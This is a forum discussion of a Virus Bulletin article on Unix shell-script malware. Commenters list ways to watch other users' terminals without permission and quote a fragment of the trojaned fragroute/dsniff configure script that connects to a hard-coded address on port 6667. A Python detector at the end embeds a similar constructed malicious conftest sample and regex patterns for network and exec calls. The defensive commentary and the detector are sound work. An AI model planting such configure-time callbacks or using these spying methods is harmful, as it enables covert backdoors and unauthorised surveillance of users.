Unix Shell-Scripting Malware
sheriff_p writes: "Virus Bulletin are running an article on Unix shell scripting malware, citing a 'zeitgeist' of interest in *nix malware following the release of {Win32/Linux}/Simile.D. The article looks at possible infection methods, possible actions the virus could take, and at a couple of real-world examples..."
Some thoughts on seeing what someone else sees:
screen can be set up with similar functionality to kibitz.
To spy without permission requires less pleasant approaches:
* If you can manage to get read permissions on Linux under /dev/vcs* you can also read the virtual consoles directly. This *might* require root access, but not always :).
* You can write a program that grovels through kernel structures and watches the output buffer for the terminal in question, displaying characters as they are output. This, obviously, is not something that should be attempted by anyone who does not have experience working with the Unix kernel. Furthermore, whatever method you come up with will probably be quite non-portable.
* With insecure X permissions, you can use xwd to dump images from a remote X server. With a short script you can also grab remote keypresses and events for logging.
>What about ./configure scripts?
Actually that seems to be the new trend amongst hax0rs who trojan program distributions. Recently it was reported to bugtraq that monkey.org was compromised and several programs including fragroute and dsniff were altered. Read the explanation of how that happened here.
What did the hax0rs add? A little present in the ./configure script. Among other things it creates a .c file called conftest with some interesting "checks" in it:
...
+ sa.sin_addr.s_addr = inet_addr("216.80.99.202");
if(connect(s, (struct sockaddr *)&sa, sizeof(sa))
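Review bot: an added line that sets sa.sin_addr.s_addr to a hard-coded inet_addr("216.80.99.202") and then calls connect() is not a build-environment probe; a legitimate conftest program exercises the compiler and libraries, never a remote host. Any configure change that embeds a literal address and opens an outbound connection should be rejected outright, and the distribution tarball compared against the upstream author's signed release before the script is ever run.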
...
It connects to the above address on port 6667 and does some other nonsense. Then it's compiled and run. The user is none the wiser unless he takes the time to read the ENTIRE ./configure script.
You can find the full diff here.
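A defender's check for the pattern this comment describes, added here as an example and not part of the thread or of any project's code: it pulls out the here-documents a configure script writes (the conftest.c probes) and flags any whose C source contains socket/connect/exec calls or a hard-coded IPv4 literal. The sample script and its 192.0.2.10 address are constructed for the example.

```python
import re

# Constructed configure excerpt modelled on the trojaned conftest.c described above; 192.0.2.10 is an RFC 5737 test address.
SAMPLE_CONFIGURE = r'''#!/bin/sh
cat > conftest.c <<EOF
int main(void) { return 0; }
EOF
cat > conftest.c <<EOF
#include <arpa/inet.h>
int main(void) {
    struct sockaddr_in sa; int s = socket(AF_INET, SOCK_STREAM, 0);
    sa.sin_family = AF_INET; sa.sin_port = htons(6667);
    sa.sin_addr.s_addr = inet_addr("192.0.2.10");
    if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) == 0) { /* payload */ }
    return 0;
}
EOF
$CC conftest.c -o conftest && ./conftest
'''
# Calls that have no business in a compiler/library probe, plus dotted-quad literals.
NET_CALLS = re.compile(r'\b(socket|connect|inet_addr|gethostbyname|system|popen|execl)\s*\(')
IPV4 = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
HEREDOC_START = re.compile(r'<<-?\s*[\'"]?(\w+)[\'"]?\s*$')

def heredocs(text):
    """Yield (line number of first body line, body) for each here-document in a shell script."""
    lines, i = text.splitlines(), 0
    while i < len(lines):
        m = HEREDOC_START.search(lines[i])
        if not m:
            i += 1
            continue
        delim, first, body = m.group(1), i + 2, []
        i += 1
        while i < len(lines) and lines[i].strip() != delim:
            body.append(lines[i])
            i += 1
        yield first, "\n".join(body)
        i += 1  # skip the terminator line

def suspicious_heredocs(text):
    """Return [(line, calls, ips)] for here-documents that embed network/exec calls or IP literals."""
    hits = []
    for line, body in heredocs(text):
        calls = sorted(set(NET_CALLS.findall(body)))
        ips = sorted(set(IPV4.findall(body)))
        if calls or ips:
            hits.append((line, calls, ips))
    return hits
```

Run it over the real ./configure before executing it; a hit is not proof of a trojan, but every flagged probe deserves a read, and the benign compiler test above produces none.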